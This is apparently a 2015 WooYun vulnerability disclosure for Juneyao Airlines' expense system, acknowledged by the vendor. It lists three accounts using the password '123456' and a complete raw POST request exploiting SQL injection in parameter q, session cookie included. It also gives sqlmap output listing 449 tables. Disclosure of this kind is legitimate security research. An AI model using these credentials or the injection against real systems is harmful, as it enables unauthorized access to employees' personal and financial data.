当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139595

漏洞标题:吉祥航空某站弱口令和SQL注入漏洞合集(涉及12个库,449个表)

相关厂商:juneyaoair.com

漏洞作者: Xmyth_夏洛克

提交时间:2015-09-07 20:54

修复时间:2015-10-23 15:44

公开时间:2015-10-23 15:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-07: 细节已通知厂商并且等待厂商处理中
2015-09-08: 厂商已经确认,细节仅向厂商公开
2015-09-18: 细节向核心白帽子及相关领域专家公开
2015-09-28: 细节向普通白帽子公开
2015-10-08: 细节向实习白帽子公开
2015-10-23: 细节向公众公开

简要描述:

23333333

详细说明:

URL:
费用报销系统后台登陆页面
http://expense.juneyaoair.com:8080/Frame/login.aspx

登陆页面.png


跑字典
三个账号被爆出来

3个账号.png


zhanghong/123456
zhangjun/123456
liulei/123456
登陆系统

费用报销系统.png


可查看报销信息

报销单.png


漏洞证明:

发消息页面的查询存在注入,

8420个员工账号.png


POST /publicpage/PubOpenListPage.aspx?ac=getdata&UserSqlPar=&q=%20AND%20text%20LIKE%20%27%27%25123%25%27%27%20%20&key=410402&u=3268 HTTP/1.1
Host: expense.juneyaoair.com:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://expense.juneyaoair.com:8080/publicPage/PubOpenListPage.aspx?key=410402&SourceWhere=&IsSingle=0&IsGetStr=1&rand=1441625347394
Content-Length: 45
Cookie: ASP.NET_SessionId=cxycaq55bf3db1550s5awdjk; ERCookie=iUserID=3268&cUserCode=zhanghong&cUserName=%e5%bc%a0%e7%ba%a2&cCredit=0.00&DepartmentName=%e8%88%aa%e6%9d
%90%e7%ae%a1%e7%90%86%e5%a4%84&DepartmentID=36&DepartmentCode=010502&CompanyIDList=&CompanyCodeList=&RoleIDList=2%2c266&RoleCodeList=002%2c266&LanguageID=1&s=G3a0FvOSXESM/
+tGAwidzZ4KVf3NqYb6&Title=&currentCompId=1&CompanyIDList2=1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
pageIndex=0&pageSize=10&sortField=&sortOrder=


参数q存在注入
sqlmap跑,涉及12个库

12个库.png


当前数据库有400多个表

Database: EXPENSE
[449 tables]
+--------------------------------+
| AFR_AbNormalDetail_CZ |
| AFR_AbNormalDetail_SK |
| AFR_AbNormalDetail_Sum |
| AFR_AbNormalMain |
| AFR_AbNormaldetail_bak |
| AFR_AbNormaldetail_bak |
| AFR_CusDetail_CW |
| AFR_CusDetail_CW |
| AFR_CusDetail_CZ |
| AFR_CusDetail_FK |
| AFR_CusDetail_SK |
| AFR_CusMain |
| AFR_FixedDetail_CW |
| AFR_FixedDetail_CW |
| AFR_FixedDetail_CZ |
| AFR_FixedDetail_FK |
| AFR_FixedDetail_SK |
| AFR_FixedMain |
| AFR_MarketingDetail_CW |
| AFR_MarketingDetail_CW |
| AFR_MarketingDetail_CZ |
| AFR_MarketingDetail_FK |
| AFR_MarketingDetail_SK |
| AFR_MarketingMain |
| AFR_NormalDetail_CW |
| AFR_NormalDetail_CW |
| AFR_NormalDetail_CZ |
| AFR_NormalDetail_FK |
| AFR_NormalDetail_SK |
| AFR_NormalDetail_Sum |
| AFR_NormalMain |
| AFR_OfficeDetail_CW |
| AFR_OfficeDetail_CW |
| AFR_OfficeDetail_CZ |
| AFR_OfficeDetail_FK |
| AFR_OfficeDetail_SK |
| AFR_OfficeMain |
| AFR_ProjectDetail_CW |
| AFR_ProjectDetail_CW |
| AFR_ProjectDetail_CZ |
| AFR_ProjectDetail_FK |
| AFR_ProjectDetail_SK |
| AFR_ProjectDetail_Sum |
| AFR_ProjectMain |
| AFR_PublicNormalDetail_CZ |
| AFR_PublicNormalDetail_CZ |
| AFR_PublicNormalDetail_SK |
| AFR_PublicNormalMain |
| AFR_PurDetail_CW |
| AFR_PurDetail_CW |
| AFR_PurDetail_CZ |
| AFR_PurDetail_FK |
| AFR_PurDetail_SK |
| AFR_PurMain |
| AFR_ServeDetail_CW |
| AFR_ServeDetail_CW |
| AFR_ServeDetail_CZ |
| AFR_ServeDetail_SK |
| AFR_ServeDetail_Sum |
| AFR_ServeMain |
| AFR_TravelDetail_BZ |
| AFR_TravelDetail_BZ |
| AFR_TravelDetail_CW |
| AFR_TravelDetail_CZ |
| AFR_TravelDetail_FK |
| AFR_TravelDetail_SK |
| AFR_TravelDetail_Sum |
| AFR_TravelDetail_ZS |
| AFR_TravelDetail_dy |
| AFR_TravelMain |
| AFR_VehicleDetail_CW |
| AFR_VehicleDetail_CW |
| AFR_VehicleDetail_CZ |
| AFR_VehicleDetail_FK |
| AFR_VehicleDetail_SK |
| AFR_VehicleMain |
| BorrowDetail_SK |
| BorrowDetail_SK |
| BorrowMain |
| Borrow_BackDetail |
| Borrow_BackMain |
| Borrow_BackOffLineDetail |
| Borrow_BackOffLineMain |
| Borrow_V_Info |
| Brrow_Report_Where |
| BudAdjustDetail |
| BudAdjustMain |
| BudConfig |
| BudPeriod |
| BudPeriodType |
| BudPeriodYear |
| BudPlanChangeLog |
| BudPlanMain_Test |
| BudPlanMain_Test |
| BudPlan_Test |
| BudPlan_Test |
| BudSolutionMap |
| BudSolutionMap |
| Bud_Bill_SqlField |
| Bud_Bill_SqlField |
| Bud_DeptMergeDetail |
| Bud_DeptMergeMain |
| Bud_MappingColumn |
| Bud_MappingDetail |
| Bud_MappingMain |
| Bud_Script |
| Bud_SpecialApproveDetail_CZ |
| Bud_SpecialApproveDetail_CZ |
| Bud_SpecialApproveMain |
| Bud_StyleType_Bill |
| Bud_StyleType_Bill |
| Bud_StyleType_WDL |
| Bud_StyleType_WDL |
| Bud_Style_Cell_Solu |
| Bud_Style_Cell_Solu |
| Bud_Style_Cell_Solu |
| Bud_Style_File |
| Bud_Style_Navigation |
| Bud_Style_Period |
| Bud_Style_User |
| Bud_Style_WDGroupDetail |
| Bud_Style_WDGroupDetail |
| Bud_Style_WDMap |
| Bud_Style_WD_CJ |
| Bud_V_Plan |
| Bud_WDL |
| Bud_WDL |
| EB_Area |
| EB_BankFileConfig |
| EB_BankFileConfig |
| EB_CashTable |
| EB_Code |
| EB_CostType |
| EB_Currency |
| EB_CusContactAdd |
| EB_CusContactAdd |
| EB_Customer |
| EB_CustomerType |
| EB_DateDay |
| EB_DateMonth |
| EB_DateYear |
| EB_Document |
| EB_FileUploadLog |
| EB_IndustryType |
| EB_InfoMain |
| EB_InfoMain |
| EB_ItemAgreeMentDetail_CZ |
| EB_ItemAgreeMentDetail_CZ |
| EB_ItemAgreeMentDetail_CZ |
| EB_ItemAgreeMentMain |
| EB_ItemStartDetail |
| EB_ItemStartMain |
| EB_Job |
| EB_PaymentType |
| EB_PrinterList |
| EB_RateAdjustLog |
| EB_ReimbStandard |
| EB_SZXM |
| EB_SZ_KM |
| EB_SubsidyStandard |
| EB_SuppContact |
| EB_Supplier |
| EB_SupplierType |
| EB_TravelBT |
| EB_TravelCW |
| EB_TravelZSBZ |
| FAGL_CashTable |
| Fa_CollectionCheckDetail |
| Fa_CollectionCheckMain |
| Fa_CollectionDetail |
| Fa_CollectionMain |
| Fa_GLBooks |
| Fa_GLCodeConfigDetail |
| Fa_GLCodeConfigMain |
| Fa_GLCodeMapMain |
| Fa_GLCodeMapMain |
| Fa_GLDataSource |
| Fa_GLDsign |
| Fa_GLExcelImport |
| Fa_GLKisVoucherError |
| Fa_GLKisVoucherError |
| Fa_GLMainSql |
| Fa_GLRPCompayS |
| Fa_GLRPDetail_Back |
| Fa_GLRPDetail_Back |
| Fa_GLRPMain_Back |
| Fa_GLRPMain_Back |
| Fa_GLServers |
| Fa_GLUFaccvouchError |
| Fa_GLUFaccvouchError |
| Fa_GLVoucherTemplate |
| Fa_GetPricePolicy |
| Fa_OtherPayDetail_CZ |
| Fa_OtherPayDetail_CZ |
| Fa_OtherPayMain |
| Fa_PayMoneyDetail_CZ |
| Fa_PayMoneyDetail_CZ |
| Fa_PayMoneyDetail_SK |
| Fa_PayMoneyMain |
| Fa_PaymentCheckDetail |
| Fa_PaymentCheckMain |
| Fa_PaymentDetail |
| Fa_PaymentMain |
| Fa_Test |
| Fa_V_FKDetail |
| Fa_VoucherTmpToGL |
| OA_ItemDocumentMain |
| OA_Overtime |
| OA_RenovateMain |
| OA_ServiceList |
| OA_TravelRequest |
| OA_VacationMain2 |
| OA_VacationMain2 |
| Per_AddedMenu |
| Project_Doc |
| Project_Mediate |
| Project_StartDetail_His |
| Project_StartDetail_His |
| Project_StartMain |
| Project_Step |
| Project_TaskPlanDetail |
| Project_TaskPlanMain |
| Project_TelnetServiceRecord |
| Project_VS_Doc |
| Report_V_BaseApport |
| Report_V_CW |
| Report_V_Req |
| Report_V_RetApprove |
| Report_V_SR |
| Report_V_bxx |
| Report_V_travel |
| Report_V_wb_item |
| Req_CusDetail_JK |
| Req_CusDetail_JK |
| Req_CusMain |
| Req_FixedDetail_JK |
| Req_FixedDetail_JK |
| Req_FixedMain |
| Req_MarketingDetail_JK |
| Req_MarketingDetail_JK |
| Req_MarketingMain |
| Req_NormalDetail_JK |
| Req_NormalDetail_JK |
| Req_NormalMain |
| Req_OfficeDetail_JK |
| Req_OfficeDetail_JK |
| Req_OfficeMain |
| Req_ProjectDetail_JK |
| Req_ProjectDetail_JK |
| Req_ProjectMain |
| Req_PurDetail |
| Req_PurMain |
| Req_ServeDetail |
| Req_ServeMain |
| Req_TravelDetail_JK |
| Req_TravelDetail_JK |
| Req_TravelDetail_ZS |
| Req_TravelMain |
| Req_VehicleDetail_JK |
| Req_VehicleDetail_JK |
| Req_VehicleMain |
| SSP_Book |
| SSP_FYType |
| SSP_UploadData |
| SSP_UploadFile |
| SSP_User |
| Sa_SRDetail |
| Sa_SRMain |
| Sys_Alert |
| Sys_AlertVSRole |
| Sys_ApproveAllowButton |
| Sys_ApproveBillApproveLog |
| Sys_ApproveCheckItemBeforePass |
| Sys_ApproveFlowList |
| Sys_ApproveMailSend |
| Sys_ApproveSubAccess |
| Sys_ApproveSubCondition |
| Sys_ApproveSubitem |
| Sys_ApproveWaiteApproveList |
| Sys_ApproveedAllowEditCols |
| Sys_BDCheck |
| Sys_BillHelperMsg |
| Sys_BillHelperMsgVsBill |
| Sys_BillHelperMsgVsRole |
| Sys_BillPrintList |
| Sys_BillVSReport |
| Sys_Company |
| Sys_Config |
| Sys_CopyDetail |
| Sys_CopyMain |
| Sys_Credit |
| Sys_CreditVSobject |
| Sys_CtrCompetenceAccess |
| Sys_CtrCompetenceDetail |
| Sys_CtrCompetenceMain |
| Sys_CtrJsCompetenceAccess |
| Sys_CtrJsCompetenceCondition |
| Sys_CtrJsCompetenceDetail |
| Sys_DataCheckItem |
| Sys_DataCheckVsToolBar |
| Sys_DataCompetenceAccess |
| Sys_DataCompetenceBaseVsBill |
| Sys_DataCompetenceCondition |
| Sys_DataCompetenceDetail |
| Sys_DefineColConfig |
| Sys_Dept |
| Sys_DeskPanel |
| Sys_DeskPanelVSRole |
| Sys_Dic |
| Sys_ExchangeRate |
| Sys_FeedBack |
| Sys_Fn |
| Sys_GridDetail |
| Sys_GridMain |
| Sys_ImportDetail |
| Sys_ImportMain |
| Sys_ImportValidItem |
| Sys_InfoMain |
| Sys_InfoMain |
| Sys_LanguageDetail |
| Sys_LanguageDetail |
| Sys_LogForBDError |
| Sys_LogForBud |
| Sys_LogForGL |
| Sys_LogForSaveBackUp |
| Sys_LogForSaveBackUp |
| Sys_LogForSqlEvent |
| Sys_LogForWF |
| Sys_Log_11 |
| Sys_Log_11 |
| Sys_Log_12 |
| Sys_Log_13 |
| Sys_Log_14 |
| Sys_MaxBillID |
| Sys_Menu |
| Sys_Message |
| Sys_MessageSendAccount |
| Sys_MessageSendLog |
| Sys_MessageSendMode |
| Sys_MessageSetting |
| Sys_MessageTask |
| Sys_MessageType |
| Sys_MessageVSReciver |
| Sys_Num |
| Sys_PageDetail |
| Sys_PageMain |
| Sys_ProgramList |
| Sys_PubPageForList |
| Sys_QFieldHideVSUid |
| Sys_QTemplateDetail |
| Sys_QTemplateDetail |
| Sys_QTemplateMain |
| Sys_QueryPageDetail |
| Sys_QueryPageMain |
| Sys_Resource |
| Sys_ResourceType |
| Sys_Role |
| Sys_RoleVSAction |
| Sys_RoleVSSolution |
| Sys_RoleVsBillColumn |
| Sys_RoleVsCompany |
| Sys_SQLFromColNameMatch |
| Sys_SQLFromPartDetail |
| Sys_SQLFromPartMain |
| Sys_SQLFromPartType |
| Sys_SQLWhereDetail |
| Sys_SQLWhereType |
| Sys_SSOConfig |
| Sys_SecondActionSql |
| Sys_SecondProcessAccess |
| Sys_SysNoRules |
| Sys_ToolBarList |
| Sys_ToolBarVSBill |
| Sys_UserVSDept |
| Sys_UserVSJob |
| Sys_UserVSRole |
| Sys_UserVsBillColumn |
| Sys_V_AllBillStatus |
| Sys_V_ApproveList |
| Sys_V_Area |
| Sys_V_Code |
| Sys_V_CostType |
| Sys_V_CtrCompetence |
| Sys_V_Dept_VS_User |
| Sys_V_Dept_VS_User |
| Sys_V_ItemDocument |
| Sys_V_ItemDocument |
| Sys_V_ItemStart |
| Sys_V_Job |
| Sys_V_Menu |
| Sys_V_PaymentList |
| Sys_V_Period |
| Sys_V_RoleVSUser |
| Sys_V_Role_VS_User |
| Sys_V_SZXM |
| Sys_V_TravelFor_RP |
| Sys_V_TravelUnionAll |
| Sys_V_UserInfo |
| Sys_V_UserRoleDept |
| Sys_V_WFStepAccess |
| Sys_WFAllowEditColsBackUp |
| Sys_WFAllowEditColsBackUp |
| Sys_WFAppOpinion |
| Sys_WFApproveLog |
| Sys_WFBillVSFlow |
| Sys_WFCheckList |
| Sys_WFConsign |
| Sys_WFDic |
| Sys_WFEventList |
| Sys_WFFlowType |
| Sys_WFFlowVSCheck |
| Sys_WFFlowVSEvent |
| Sys_WFMailCCUser |
| Sys_WFMailTempVSFlow |
| Sys_WFMailTemplateDetail |
| Sys_WFMailTemplateDetail |
| Sys_WFMonitorLog |
| Sys_WFStepAccessDynamic |
| Sys_WFStepAccessDynamic |
| Sys_WFStepAccessDynamic |
| Sys_WFStepDynamic |
| Sys_WFStepRelation |
| Sys_WFTransferApp |
| Sys_WFWaiteApprove |
| Sys_WFWebPageDetail |
| Sys_WFWebPageMain |
| Sys_Website |
| Test_List |
| Test_SetBillCount |
| Tran_CenterError |
| Tran_EB_Code |
| Tran_NC_ARAP_DJFB |
| Tran_NC_ARAP_DJZB |
| Tran_Sys_Dept |
| Tran_Sys_Role |
| Tran_Sys_User |
| V_AFR_TravelDetail |
| Z_JiShuLevel |
| aaa |
| aaa |
| bbb |
| nc |
| sys_MessageReciverType |
| sys_PageDataSourceSql |
| sys_user_bak |
| sys_user_bak |
| tmp_user |
| u_tmp |
| 期初借款 |
+--------------------------------+


8000多个员工的信息包括账号密码应该都在里面,就不证明了

修复方案:

这么多数据,并没有脱裤,求20rank!!!

版权声明:转载请注明来源 Xmyth_夏洛克@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-09-08 15:43

厂商回复:

漏洞已经确认

最新状态:

暂无